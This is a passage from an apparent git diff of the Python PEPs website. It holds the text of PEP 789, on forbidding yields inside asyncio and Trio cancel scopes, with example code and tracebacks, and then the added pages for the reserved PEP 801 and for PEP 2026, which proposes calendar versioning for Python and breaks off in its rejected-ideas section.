Structured concurrency is increasingly popular in Python, in the form of newer +asyncio interfaces and third-party libraries such as Trio and anyio. +These interfaces support compositional reasoning, so long as users never write +a yield which suspends a frame while inside a cancel scope.

+

A cancel scope is a context manager which can… cancel… whatever work occurs +within that context (…scope). In asyncio, this is implicit in the design of +with asyncio.timeout(): or async with asyncio.TaskGroup() as tg:, which +respectively cancel the contained work after the specified duration, or cancel +sibling tasks when one of them raises an exception. The core functionality of +a cancel scope is synchronous, but the user-facing context managers may be +either sync or async. [1] [2]

+

This structured approach works beautifully, unless you hit one specific sharp +edge: breaking the nesting structure by yielding inside a cancel scope. +This has much the same effect on structured control flow as adding just a few +cross-function gotos, and the effects are truly dire:

+
    +
  • The wrong task can be canceled, whether due to a timeout, an error in a +sibling task, or an explicit request to cancel some other task
  • +
  • Exceptions, including CancelledError, can be delivered to the wrong task
  • +
  • Exceptions can go missing entirely, being dropped instead of added to an +ExceptionGroup
  • +
+
+
+

Problem statement

+

Here’s the fundamental issue: yield suspends a call frame. It only makes sense +to yield in a leaf frame – i.e., if your call stack goes like A -> B -> C, then +you can suspend C, but you can’t suspend B while leaving C running.

+

But, TaskGroup is a kind of “concurrent call” primitive, where a single frame +can have multiple child frames that run concurrently. This means that if we +allow people to mix yield and TaskGroup, then we can end up in exactly this +situation, where B gets suspended but C is actively running. This is +nonsensical, and causes serious practical problems (e.g., if C raises an +exception and A has returned, we have no way to propagate it).

+

This is a fundamental incompatibility between generator control flow and +structured concurrency control flow, not something we can fix by tweaking our +APIs. The only solution seems to be to forbid yield inside a TaskGroup.

+

Although timeouts don’t leave a child task running, the close analogy and +related problems lead us to conclude that yield should be forbidden inside all +cancel scopes, not only TaskGroups. See Can’t we just deliver exceptions to the right place? for discussion.

+
+
+

Motivating examples

+

Let’s consider three examples, to see what this might look like in practice.

+
+

Leaking a timeout to the outer scope

+

Suppose that we want to iterate over an async iterator, but wait for at most +max_time seconds for each element. We might naturally encapsulate the logic +for doing so in an async generator, so that the call site can continue to use a +straightforward async for loop:

+
async def iter_with_timeout(ait, max_time):
+    try:
+        while True:
+            with timeout(max_time):
+                yield await anext(ait)
+    except StopAsyncIteration:
+        return
+
+async def fn():
+    async for elem in iter_with_timeout(ait, max_time=1.0):
+        await do_something_with(elem)
+
+
+

Unfortunately, there’s a bug in this version: the timeout might expire after the +generator yields but before it is resumed! In this case, we’ll see a +CancelledError raised in the outer task, where it cannot be caught by the +with timeout(max_time): statement.

+

The fix is fairly simple: get the next element inside the timeout context, and +then yield outside that context.

+
async def correct_iter_with_timeout(ait, max_time):
+    try:
+        while True:
+            with timeout(max_time):
+                tmp = await anext(ait)
+            yield tmp
+    except StopAsyncIteration:
+        return
+
+
+
+
+

Leaking background tasks (breaks cancellation and exception handling)

+

Timeouts are not the only interface which wrap a cancel scope - and if you +need some background worker tasks, you can’t simply close the TaskGroup +before yielding.

+

As an example, let’s look at a fan-in generator, which we’ll use to merge the +feeds from several “sensors”. We’ll also set up our mock sensors with a small +buffer, so that we’ll raise an error in the background task while control flow +is outside the combined_iterators generator.

+
import asyncio, itertools
+
+async def mock_sensor(name):
+    for n in itertools.count():
+        await asyncio.sleep(0.1)
+        if n == 1 and name == "b":  # 'presence detection'
+            yield "PRESENT"
+        elif n == 3 and name == "a":  # inject a simple bug
+            print("oops, raising RuntimeError")
+            raise RuntimeError
+        else:
+            yield f"{name}-{n}"  # non-presence sensor data
+
+async def move_elements_to_queue(ait, queue):
+    async for obj in ait:
+        await queue.put(obj)
+
+async def combined_iterators(*aits):
+    """Combine async iterators by starting N tasks, each of
+    which move elements from one iterable to a shared queue."""
+    q = asyncio.Queue(maxsize=2)
+    async with asyncio.TaskGroup() as tg:
+        for ait in aits:
+            tg.create_task(move_elements_to_queue(ait, q))
+        while True:
+            yield await q.get()
+
+async def turn_on_lights_when_someone_gets_home():
+    combined = combined_iterators(mock_sensor("a"), mock_sensor("b"))
+    async for event in combined:
+        print(event)
+        if event == "PRESENT":
+            break
+    print("main task sleeping for a bit")
+    await asyncio.sleep(1)  # do some other operation
+
+asyncio.run(turn_on_lights_when_someone_gets_home())
+
+
+

When we run this code, we see the expected sequence of observations, then a +‘detection’, and then while the main task is sleeping we trigger that +RuntimeError in the background. But… we don’t actually observe the +RuntimeError, not even as the __context__ of another exception!

+
>> python3.11 demo.py
+a-0
+b-0
+a-1
+PRESENT
+main task sleeping for a bit
+oops, raising RuntimeError
+
+Traceback (most recent call last):
+  File "demo.py", line 39, in <module>
+    asyncio.run(turn_on_lights_when_someone_gets_home())
+  ...
+  File "demo.py", line 37, in turn_on_lights_when_someone_gets_home
+    await asyncio.sleep(1)  # do some other operation
+  File ".../python3.11/asyncio/tasks.py", line 649, in sleep
+    return await future
+asyncio.exceptions.CancelledError
+
+
+

Here, again, the problem is that we’ve yielded inside a cancel scope; +this time the scope which a TaskGroup uses to cancel sibling tasks when one +of the child tasks raises an exception. However, the CancelledError which +was intended for the sibling task was instead injected into the outer task, +and so we never got a chance to create and raise an +ExceptionGroup(..., [RuntimeError()]).

+

To fix this, we need to turn our async generator into an async context manager, +which yields an async iterable - in this case a generator wrapping the queue; in +future perhaps the queue itself:

+
async def queue_as_aiterable(queue):
+    # async generators that don't `yield` inside a cancel scope are fine!
+    while True:
+        try:
+            yield await queue.get()
+        except asyncio.QueueShutDown:
+            return
+
+@asynccontextmanager  #  yield-in-cancel-scope is OK in a context manager
+async def combined_iterators(*aits):
+    q = asyncio.Queue(maxsize=2)
+    async with asyncio.TaskGroup() as tg:
+        for ait in aits:
+            tg.create_task(move_elements_to_queue(ait, q))
+        yield queue_as_aiterable(q)
+
+async def turn_on_lights_when_someone_gets_home():
+    ...
+    async with combined_iterators(...) as ait:
+        async for event in ait:
+            ...
+
+
+
+
+

In a user-defined context manager

+

Yielding inside a cancel scope can be safe, if and only if you’re using the +generator to implement a context manager [3] - in this case any +propagating exceptions will be redirected to the expected task.

+

We’ve also implemented the ASYNC101 linter rule in flake8-async, which warns against yielding in +known cancel scopes. Could user education be sufficient to avoid these +problems? Unfortunately not: user-defined context managers can also wrap a +cancel scope, and it’s infeasible to recognize or lint for all such cases.

+

This regularly arises in practice, because ‘run some background tasks for the +duration of this context’ is a very common pattern in structured concurrency. +We saw that in combined_iterators() above; and have seen this bug in +multiple implementations of the websocket protocol:

+
async def get_messages(websocket_url):
+    # The websocket protocol requires background tasks to manage the socket heartbeat
+    async with open_websocket(websocket_url) as ws:  # contains a TaskGroup!
+        while True:
+            yield await ws.get_message()
+
+async with open_websocket(websocket_url) as ws:
+    async for message in get_messages(ws):
+        ...
+
+
+
+
+
+

Specification

+

To prevent these problems, we propose:

+
    +
  1. a new context manager, with sys.prevent_yields(reason): ... which will +raise a RuntimeError if you attempt to yield while inside it. [4] +Cancel-scope-like context managers in asyncio and downstream code can then +wrap this to prevent yielding inside their with-block.
  2. +
  3. a mechanism by which generator-to-context-manager decorators can allow yields +across one call. We’re not yet sure what this should look like; the leading +candidates are:
      +
    1. a code-object attribute, fn.__code__.co_allow_yields = True, or
    2. +
    3. some sort of invocation flag, e.g. fn.__invoke_with_yields__, to avoid +mutating a code object that might be shared between decorated and undecorated +functions
    4. +
    +
  4. +
+
+

Implementation - tracking frames

+

The new sys.prevent_yields context manager will require interpreter support. +For each frame, we track the entries and exits of this context manager.

+

We’re not particularly attached to the exact representation; we’ll discuss it as +a stack (which would support clear error messages), but more compact +representations such as pair-of-integers would also work.

+
    +
  • When entering a newly-created or resumed frame, initialize empty stacks of +entries and exits.
  • +
  • When returning from a frame, merge these stacks into that of the parent frame.
  • +
  • When yielding:
      +
    • if entries != [] and not frame.allow_yield_flag, raise a RuntimeError +instead of yielding (the new behavior this PEP proposes)
    • +
    • otherwise, merge stacks into the parent frame as for a return.
    • +
    +
  • +
+

Because this is about yielding frames within a task, not switching between +tasks, syntactic yield and yield from should be affected, but await +expressions should not.

+

We can reduce the overhead by storing this metadata in a single stack per thread +for all stack frames which are not generators.

+
+
+

Worked examples

+
+

No-yield example

+

In this example, we see multiple rounds of the stack merging as we unwind from +sys.prevent_yields, through the user-defined ContextManager, back to the +original Frame. For brevity, the reason for preventing yields is not shown; +it is part of the “1 enter” state.

+../_images/pep-789-example-no-yield.png + +

With no yield we don’t raise any errors, and because the number of enters +and exits balance the frame returns as usual with no further tracking.

+
+
+

Attempts-to-yield example

+

In this example, the Frame attempts to yield while inside the +sys.prevent_yields context. This is detected by the interpreter, +which raises a RuntimeError instead of suspending the frame.

+../_images/pep-789-example-yield-errors.png + +
+
+

Allowed-to-yield example

+

In this example, a decorator has marked the Frame as allowing yields. This +could be @contextlib.contextmanager or a related decorator.

+../_images/pep-789-example-yield-allowed.png + +

When the Frame is allowed to yield, the entry/exit stack is merged into the +parent frame’s stack before suspending. When the Frame resumes, its stack is +empty. Finally, when the Frame exits, the exit is merged into the parent +frame’s stack, rebalancing it.

+

This ensures that the parent frame correctly inherits any remaining +sys.prevent_yields state, while allowing the Frame to safely suspend +and resume.

+
+
+

Allowing yield for context managers

+

TODO: this section is a placeholder, pending a decision on the mechanism for +``@contextmanager`` to re-enable yields in the wrapped function.

+
    +
  • Explain and show a code sample of how @asynccontextmanager sets the flag
  • +
+

Note that third-party decorators such as @pytest.fixture demonstrate that +we can’t just have the interpreter special-case contextlib.

+
+
+
+

Behavior if sys.prevent_yields is misused

+

While unwise, it’s possible to call sys.prevent_yields.__enter__ and +.__exit__ in an order that does not correspond to any valid nesting, or get +an invalid frame state in some other way.

+

There are two ways sys.prevent_yields.__exit__ could detect an invalid state. +First, if yields are not prevented, we can simply raise an exception without +changing the state. Second, if an unexpected entry is at the top of the stack, +we suggest popping that entry and raising an exception – this ensures that +out-of-order calls will still clear the stack, while still making it clear that +something is wrong.

+

(and if we choose e.g. an integer- rather than stack-based representation, such +states may not be distinguishable from correct nesting at all, in which case the +question will not arise)

+
+
+
+

Anticipated uses

+

In the standard library, sys.prevent_yields could be used by +asyncio.TaskGroup, asyncio.timeout, and asyncio.timeout_at. +Downstream, we expect to use it in trio.CancelScope, async fixtures (in +pytest-trio, anyio, etc.), and perhaps other places.

+

We consider use-cases unrelated to async correctness, such as preventing +decimal.localcontext from leaking out of a generator, out of scope for this +PEP.

+

The generator-to-context-manager support would be used by +@contextlib.(async)contextmanager, and if necessary in (Async)ExitStack.

+
+
+

Backwards Compatibility

+

The addition of the sys.prevent_yields context manager, changes to +@contextlib.(async)contextmanager, and corresponding interpreter +support are all fully backwards-compatible.

+

Preventing yields inside asyncio.TaskGroup, asycio.timeout, and +asyncio.timeout_at would be a breaking change to at least some code in the +wild, which (however unsafe and prone to the motivating problems above) may work +often enough to make it into production.

+

We will seek community feedback on appropriate deprecation pathways for +standard-library code, including the suggested length of any deprecation period. +As an initial suggestion, we could make suspending stdlib contexts emit a +DeprecationWarning only under asyncio debug mode in 3.14; then transition to +warn-by-default and error under debug mode in 3.15; and finally a hard error in +3.16.

+

Irrespective of stdlib usage, downstream frameworks would adopt this +functionality immediately.

+
+

How widespread is this bug?

+

We don’t have solid numbers here, but believe that many projects are affected in +the wild. Since hitting a moderate and a critical bug attributed to suspending +a cancel scope in the same week at work, we’ve used static analysis with some success. Three +people Zac spoke to at PyCon recognized the symptoms and concluded that they had +likely been affected.

+

TODO: run the ASYNC101 lint rule across ecosystem projects, e.g. the aio-libs +packages, and get some sense of frequency in widely-used PyPI packages? +This would help inform the break/deprecation pathways for stdlib code.

+
+
+
+

How to Teach This

+

Async generators are very rarely taught to novice programmers.

+

Most intermediate and advanced Python programmers will only interact with this +PEP as users of TaskGroup, timeout, and @contextmanager. For this +group, we expect a clear exception message and documentation to be sufficient.

+
    +
  • A new section will be added to the developing with asyncio page, which +briefly states that async generators are not permitted to yield when +inside a “cancel scope” context, i.e. TaskGroup or timeout context +manager. We anticipate that the problem-restatement and some parts of the +motivation section will provide a basis for these docs.
      +
    • When working in codebases which avoid async generators entirely [5], +we’ve found that an async context manager yielding an async iterable is a safe +and ergonomic replacement for async generators – and avoids the delayed-cleanup +problems described in PEP 533, which this proposal does not address.
    • +
    +
  • +
  • In the docs for each context manager which wraps a cancel scope, and thus now +sys.prevent_yields, include a standard sentence such as “If used within an +async generator, [it is an error to yield inside this context manager].” +with a hyperlink to the explanation above.
  • +
+

For asyncio, Trio, curio, or other-framework maintainers who implement +cancel scope semantics, we will ensure that the documentation of +sys.prevent_yields gives a full explanation distilled from the solution and +implementation sections of this PEP. We anticipate consulting most such +maintainers for their feedback on the draft PEP.

+
+
+

Rejected alternatives

+
+

PEP 533, deterministic cleanup for iterators

+

PEP 533 proposes adding __[a]iterclose__ to the iterator protocol, +essentially wrapping a with [a]closing(ait) around each (async) for loop. +While this would be useful for ensuring timely and deterministic cleanup of +resources held by iterators, the problem it aims to solve, it does not fully +address the issues that motivate this PEP.

+

Even with PEP 533, misfired cancellations would still be delivered to the wrong +task and could wreak havoc before the iterator is closed. Moreover, it does not +address the fundamental structured concurrency problem with TaskGroup, where +suspending a frame that owns a TaskGroup is incompatible with the model of child +tasks being fully encapsulated within their parent frame.

+
+
+

Deprecate async generators entirely

+

At the 2024 language summit, several attendees suggested instead deprecating async +generators in toto. Unfortunately, while the common-in-practice cases all use +async generators, Trio code can trigger the same problem with standard generators:

+
# We use Trio for this example, because while `asyncio.timeout()` is async,
+# Trio's CancelScope type and timeout context managers are synchronous.
+import trio
+
+def abandon_each_iteration_after(max_seconds):
+    # This is of course broken, but I can imagine someone trying it...
+    while True:
+        with trio.move_on_after(max_seconds):
+            yield
+
+@trio.run
+async def main():
+    for _ in abandon_each_iteration_after(max_seconds=1):
+        await trio.sleep(3)
+
+
+

If it wasn’t for the bug in question, this code would look pretty idiomatic - +but after about a second, instead of moving on to the next iteration it raises:

+
Traceback (most recent call last):
+  File "demo.py", line 10, in <module>
+    async def main():
+  File "trio/_core/_run.py", line 2297, in run
+    raise runner.main_task_outcome.error
+  File "demo.py", line 12, in main
+    await trio.sleep(3)
+  File "trio/_timeouts.py", line 87, in sleep
+    await sleep_until(trio.current_time() + seconds)
+  ...
+  File "trio/_core/_run.py", line 1450, in raise_cancel
+    raise Cancelled._create()
+trio.Cancelled: Cancelled
+
+
+

Furthermore, there are some non-cancel-scope synchronous context managers which +exhibit related problems, such as the abovementioned decimal.localcontext. +While fixing the example below is not a goal of this PEP, it demonstrates that +yield-within-with problems are not exclusive to async generators:

+
import decimal
+
+def why_would_you_do_this():
+    with decimal.localcontext(decimal.Context(prec=1)):
+        yield
+
+one = decimal.Decimal(1)
+print(one / 3)  # 0.3333333333333333333333333333
+next(gen := why_would_you_do_this())
+print(one / 3)  # 0.3
+
+
+

While I’ve had good experiences in async Python without async generators +[5], I’d prefer to fix the problem than remove them from the +language.

+
+
+

Can’t we just deliver exceptions to the right place?

+

If we implemented PEP 568 (Generator-sensitivity for Context Variables; see +also PEP 550), it would be possible to handle exceptions from timeouts: the +event loop could avoid firing a CancelledError until the generator frame +which contains the context manager is on the stack - either when the generator +is resumed, or when it is finalized.

+

This can take arbitrarily long; even if we implemented PEP 533 to ensure +timely cleanup on exiting (async) for-loops it’s still possible to drive a +generator manually with next/send.

+

However, this doesn’t address the other problem with TaskGroup. The model +for generators is that you put a stack frame in suspended animation and can then +treat it as an inert value which can be stored, moved around, and maybe +discarded or revived in some arbitrary place. The model for structured +concurrency is that your stack becomes a tree, with child tasks encapsulated +within some parent frame. They’re extending the basic structured programming +model in different, and unfortunately incompatible, directions.

+

Suppose for example that suspending a frame containing an open TaskGroup +also suspended all child tasks. This would preserve the ‘downward’ structured +concurrency, in that children remain encapsulated - albeit at the cost of +deadlocking both of our motivating examples, and much real-world code. +However, it would still be possible to resume the generator in a different +task, violating the ‘upwards’ invariant of structured concurrency.

+

We don’t think it’s worth adding this much machinery to handle cancel scopes, +while still leaving task groups broken.

+
+
+

Alternative implementation - inspecting bytecode

+

Jelle Zijlstra has sketched an alternative, where sys.prevent_yields +inspects the bytecode of callers until satisfied that there is no yield between +the calling instruction pointer and the next context exit. We expect that +support for syntatically-nested context managers could be added fairly easily.

+

However, it’s not yet clear how this would work when user-defined context +managers wrap sys.prevent_yields. Worse, this approach ignores explicit +calls to __enter__() and __exit__(), meaning that the context management +protocol would vary depending on whether the with statement was used.

+

The ‘only pay if you use it’ performance cost is very attractive. However, +inspecting frame objects is prohibitively expensive for core control-flow +constructs, and causes whole-program slowdowns via de-optimization. +On the other hand, adding interpreter support for better performance leads +back to the same pay-regardless semantics as our preferred solution above.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0789.rst

+

Last modified: 2024-06-04 01:45:13 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0801/index.html b/pep-0801/index.html new file mode 100644 index 00000000000..19b48dff3a4 --- /dev/null +++ b/pep-0801/index.html @@ -0,0 +1,133 @@ + + + + + + + + PEP 801 – Reserved | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+ + +
+ + + + + \ No newline at end of file diff --git a/pep-2026/index.html b/pep-2026/index.html new file mode 100644 index 00000000000..04d7925f3bb --- /dev/null +++ b/pep-2026/index.html @@ -0,0 +1,1030 @@ + + + + + + + + PEP 2026 – Calendar versioning for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 2026 – Calendar versioning for Python

+
+
Author:
+
Hugo van Kemenade
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Process
+
Created:
+
11-Jun-2024
+
Python-Version:
+
3.26
+
Post-History:
+
14-Jun-2024
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes updating the versioning scheme for Python to include +the calendar year.

+

Calendar Versioning (CalVer) makes everything easier to translate into +calendar time rather than counting versions and looking up when they will be +(or were) released:

+
    +
  • The support lifecycle is clear, +making it easy to see when a version was first released.
  • +
  • Deprecations are easier to manage for maintainers and users.
  • +
  • It’s easier to work out when a version will reach end of life (EOL).
  • +
  • It helps people, especially new learners, understand how old their installation is.
  • +
  • It’s easier to reason about which versions of Python to support +for libraries and applications.
  • +
+

Starting with what would have been Python 3.15, +the version is 3.YY.micro where YY is the year of initial release:

+
    +
  • Python 3.26 will be released in 2026 instead of Python 3.15. +EOL is five years after initial release, +therefore Python 3.26 will reach EOL in 2031.
  • +
  • Python 3.27 will be released in 2027, and so on.
  • +
+
+
+

Motivation and rationale

+

In 2019, we adopted an annual release cycle with PEP 602, which opened the +door for calendar versioning:

+
+
Adopting an annual release calendar allows for natural switching to calendar +versioning, for example by calling Python 3.9 “Python 3.20” since it’s +released in October ‘20 and so on (“Python 3.23” would be the one released +in October ‘23).

While the ease of switching to calendar versioning can be treated as an +advantage of an annual release cycle, this PEP does not advocate for or +against a change in how Python is versioned. Should the annual release +cycle be adopted, the versioning question will be dealt with in a separate +PEP.

+
+

This is that PEP.

+
+

Current scheme

+

From the General Python FAQ: +How does the Python version numbering scheme work?

+
+
Python versions are numbered “A.B.C” or “A.B”:
    +
  • A is the major version number +– it is only incremented for really major changes in the language.
  • +
  • B is the minor version number +– it is incremented for less earth-shattering changes.
  • +
  • C is the micro version number +– it is incremented for each bugfix release.
  • +
+
+
+
+

Python predates SemVer

+

Semantic Versioning (SemVer) +is a popular scheme which aims to communicate the intent of a release (though it +doesn’t always succeed).

+
+
Given a version number MAJOR.MINOR.PATCH, increment the:
    +
  1. MAJOR version when you make incompatible API changes
  2. +
  3. MINOR version when you add functionality in a backward compatible manner
  4. +
  5. PATCH version when you make backward compatible bug fixes
  6. +
+
+

People often assume Python follows SemVer and +complain +about +breaking +changes +in feature +releases. +But Python predates SemVer by at least 15 years: +the SemVer spec was introduced in 2009 +and the bespoke Python scheme was added to source control in 1994 +for the 1.0 release.

+

If Python adopted SemVer, that would imply a new major bump every year when +we remove deprecations.

+

Instead of SemVer, however, some projects have adopted another versioning +scheme based on the calendar.

+
+
+

Calendar versioning

+

With Calendar Versioning (CalVer), +you include some element of the date in the version number. +For example, +Ubuntu and Black use the year and month – Ubuntu 24.04 came out in April 2024; +pip and PyCharm use only the year.

+ + + + + + + + + + + + + + + + + + + + +
UbuntuBlackpipPyCharm
YY.0M.microYY.MM.microYY.minor.microYYYY.minor.micro
+
23.04
+
23.10
+
24.04
+
24.10
+
+
+
23.12.1
+
24.1.0
+
24.1.1
+
24.2.0
+
+
+
23.3
+
23.3.1
+
23.3.2
+
24.0
+
+
+
2023.3.5
+
2024.1
+
2024.1.1
+
2024.1.2
+
+
+

And here are some programming language standards, +all using some form of the year:

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
AdaAlgolCC++Fortran
+
ECMAScript
+
aka JavaScript
+
+
YY / YYYYYYYYYYYY / YYYYYYYY
+
83
+
95
+
2012
+
2022
+
+
+
58
+
60
+
68
+
+
+
89
+
99
+
11
+
23
+
+
+
98
+
03
+
11
+
23
+
+
+
66
+
90
+
2003
+
2023
+
+
+
2020
+
2021
+
2022
+
2023
+
+
+
+
+

Annual release cadence

+

Since 2019, we’ve made a release each year:

+
    +
  • 3.15.0 will be released in 2026
  • +
  • 3.16.0 will be released in 2027
  • +
  • 3.17.0 will be released in 2028
  • +
  • 3.18.0 will be released in 2029
  • +
  • 3.19.0 will be released in 2030
  • +
+

This is sort of calendar-based, it’s just that it’s offset by 11 years.

+
+
+

CalVer for Python

+

The simplest CalVer option would be to stick with major version 3, +and encode the year in the minor version:

+
    +
  • 3.26.0 will be released in 2026
  • +
  • 3.27.0 will be released in 2027
  • +
  • 3.28.0 will be released in 2028
  • +
  • 3.29.0 will be released in 2029
  • +
  • 3.30.0 will be released in 2030
  • +
+

For example, 3.26 will be released in 2026. +It makes it obvious when a release first came out.

+
+
+

Clarity of deprecation removal

+

Warnings for deprecations often mention the version they will be removed in. +For example:

+
+
DeprecationWarning: ‘ctypes.SetPointerType’ is deprecated and slated for +removal in Python 3.15
+

However, once aware of CalVer, it is immediately obvious from the warning how +long you have to take action:

+
+
DeprecationWarning: ‘ctypes.SetPointerType’ is deprecated and slated for +removal in Python 3.26
+
+
+

Clarity of support lifecycle

+

Right now, it’s a little tricky to work out when a release is end-of-life. +First you have to look up when it was initially released, then add 5 years:

+
+
“When will Python 3.11 be EOL?”

“Well, let’s see… PEP 664 is the 3.11 release schedule, it says 3.11 was +released in 2022, EOL after 5 years, so 2022 + 5 = 2027.”

+
+

But if the initial release year is right there in the version, +it’s much easier:

+
+
“When will Python 3.26 be EOL?”

“26 + 5 = [20]31”

+
+
+
+

Clarity of installation age

+

With the year in the version, it’s easier to work out how old your installation +is. For example, with the current scheme, if you’re using Python 3.15 in 2035, +it’s not immediately clear that it was first released in 2026 (and has been EOL +since 2031).

+

With knowledge of CalVer, if you’re using Python 3.26 in 2035, it’s clear it was +first released nine years ago and it’s probably time to upgrade.

+

This can help prompt people to switch to supported releases still under security +support, and help in teaching new users who may have older installations.

+
+
+

Clarity of version support

+

CalVer makes it easier to reason about which versions of Python to support.

+

For example, without CalVer, setting your minimum compatible Python version to +3.19 in 2031 sets an aggressive assumption regarding version adoption and +support.

+

However, with CalVer, this is more obvious if setting the minimum to 3.30 in +2031. For wider support, perhaps you prefer setting it to 3.26.

+

Similarly, library maintainers supporting all CPython upstream versions +need to test against five versions (or six including the pre-release).

+

For example, in 2030, the supported versions without CalVer would be:

+
    +
  • 3.15, 3.16, 3.17, 3.18, 3.19
  • +
+

With CalVer they would be:

+
    +
  • 3.26, 3.27, 3.28, 3.29, 3.30
  • +
+

A maintainer can see at a glance which versions are current and need testing.

+
+
+

Non-goals

+

Like the current scheme, only the micro version will be incremented for bug +fix and security releases, with no change to the major and minor. For example:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Current schemeProposed 3.YY.micro
Initial release (Oct ’26)3.15.03.26.0
1st bugfix release (Dec ’26)3.15.13.26.1
2nd bugfix release (Feb ’27)3.15.23.26.2
Final security release (Oct ’31)3.15.173.26.17
+

No change to PEP 602 (Annual Release Cycle for Python):

+
    +
  • No change to the 17 months to develop a feature version: alphas, betas and +release candidates.
  • +
  • No change to the support duration: +two years of full support and three years of security fixes.
  • +
  • No change to the annual October release cadence.
  • +
+
+
+
+

Specification

+

Python versions are numbered 3.YY.micro where:

+
    +
  • 3 is the major version number +– it is always 3.
  • +
  • YY is the minor version number +- it is the short year number: {year} - 2000.
  • +
  • micro is the micro version number +- it is incremented for each bugfix or security release.
  • +
+

We’ll keep major version 3. Python 3 is the brand; there will be no Python 4.

+

In the year 2100, the minor will be 2100-2000 = 100, +therefore the version will be 3.100.0.

+

Python 3.14 will be the last version before this change, released in 2025. +Python 3.26 will be the first version after this change, released in 2026. +There will be no Python 3.15 to 3.25 inclusive.

+
+
+

Security implications

+

None known. No change to durations or timing of bug fix and security phases.

+
+
+

How to teach this

+

We will announce this on blogs, in the 3.14 release notes, documentation, +and through outreach to the community.

+

This change targets the version following 3.14: +instead of 3.15 it will be 3.26. +This PEP was proposed in June 2024. +Development for the 3.15/3.26 release will begin in May 2025, +with the first alpha in October 2025 and initial release in October 2026. +We can already update documentation during the 3.14 cycle. +This gives plenty of notice.

+

We can make preview builds which only change the version for early testing.

+

We could ship a python3.15 command as part of Python 3.26 that immediately +errors out and tells the user to use python3.26 instead.

+
+
+

Rejected ideas

+
+

YY.0

+

For example, Python 26.0 would be released in 2026.

+

There’s not much appetite for Python version 4. +We don’t want to repeat 2-to-3, +and 4 has a lot of expectations by now. +We don’t want “earth-shattering changes”.

+

Perhaps Python 4 could be reserved for something big like removing the GIL +(PEP 703), +but the Steering Council made it clear the free-threading rollout must be gradual. +Will we stick with version 3 forever?

+

Another option would be to put the year in the major version and jump to 26.0. +This could mean we could leapfrog all that 4.0 baggage.

+
+

Platform compatibility tags

+

Changing the major version would complicate packaging, however.

+

The Platform compatibility tags specification says the Python +version tag used in wheel filenames is given by +sysconfig.get_config_var("py_version_nodot"), +where the major and minor versions are joined together without a dot. +For example, 3.9 is 39.

+

During the 3.10 alpha, there was ambiguity because 310 can be interpreted +as 3.10, 31.0, or 310.

+

The specification says an underscore can be used if needed, and PEP 641 +(“Using an underscore in the version portion of Python 3.10 compatibility tags”) +proposed this:

+ + + + + + + + + + + + + + + + + + + + + +
Version → tag → versionPEP 641 proposed version
Pre-3.103.9 → 39
Ambiguity after 3.103.10 → 310 → 3.10 or 31.0 or 310?3_10
Ambiguity with YY.xx26.0 → 260 → 2.60 or 26.0 or 260?26_0
+

However, PEP 641 was rejected +because it was unknown what side effects there would be on code +we’re not aware of.

+

We would need something like this for YY.0 versioning, +which would be a significant amount of complex work.

+
+
+

Ecosystem changes

+

Would changing the major version to double digits break code?

+

Yes, any novel change to the version inevitably does because people make +assumptions, such as the major always being 3, or that the version parts are +always single digits. For example:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Version changeExampleExpectedActual
2.7.9 → 2.7.10
'this is Python {}'.format(sys.version[:5])
+
+
+
2.7.102.7.1
3.9 → 3.10
".%s-%s" % (get_platform(), sys.version[0:3])
+
+
+
3.103.1
3 → 4
if sys.version_info[1] >= 9:
+
+
+
4.00
3 → 26
if sys.version[0] == '3':
+
+
+
262
+

The last one here is most relevant for YY.0 versioning. +Therefore the 3.YY scheme is the safest and requires fewest changes, +because the shape of the version doesn’t change: +it’s still a 3 followed by two digits.

+
+

Tip

+

Use +Ruff’s YTT rules or +Flake8’s flake8-2020 plugin +to help find the problems like these.

+
+
+
+

python3 command

+

PEP 394 (The “python” Command on Unix-Like Systems) +outlines recommendations for the python, python2 and python3 +commands. python can map to either python2 or python3. +These would need revisiting if the major version changed, and started changing annually.

+

Four years after Python 2.7’s end-of-life, we could recommend python only +maps to the latest Python 3+ version. +But what would python3 map to when Python 26.0 is out? +This would introduce additional complexity and cost.

+
+
+

CPython changes

+

In addition to python3 command changes, there are at least four places in +CPython that assume the major version is 3 and would need updating:

+ +
+
+

YY.0 rejection

+

The benefits of calendar versioning are not so big compared to the combined +costs for YY.0 versioning. Therefore, YY.0 versioning is rejected.

+
+
+
+

YY.MM

+

For example, Python 26.10 would be released in October 2026.

+

Building upon YY.0 versioning, we could also include the release month as the minor +version, like Ubuntu and Black. This would make it clear when in the year it was +released, and also when in the year it will reach end-of-life.

+

However, YY.MM versioning is rejected for many of the same reasons as YY.0 versioning.

+
+
+

3.YYYY

+

For example, Python 3.2026 would be released in 2026.

+

It’s clearer that the minor version is a year when using a four digits, and +avoids confusion with Ubuntu versions which use YY.MM.

+
+

PY_VERSION_HEX

+

CPython’s C API PY_VERSION_HEX macro currently uses +eight bits to encode the minor version, accommodating a maximum minor version of +255. To hold a four-digit year, it would need to be expanded to 11 bits to fit +2047 or rather 12 bits for 4095.

+

This looks feasible, as it’s intended for numeric comparisons, such as +#if PY_VERSION_HEX >= .... In the top 8,000 PyPI projects +only one instance was found of bit shifting +(hexversion >> 16 != PY_VERSION_HEX >> 16).

+

However, 3.YYYY is rejected as changing from two to four digits would +nevertheless need more work and break more code than simpler 3.YY versioning.

+
+
+
+

Editions

+

For example, Python 3.15 (2026 Edition) would be released in 2026.

+

The Rust language uses +“Editions” +to introduce breaking changes. Applying this to Python would require big +changes to PEP 387 (Backwards Compatibility Policy) and is out of scope +for this PEP.

+

We could apply a year label to releases, such as “Python 3.15 (2026 Edition)”, +but this is rejected because we’d have to keep track of two numbers.

+
+
+

Adopt SemVer and skip 4

+

For example, Python 5.0 would be released in 2026, 6.0 in 2027, and so on.

+

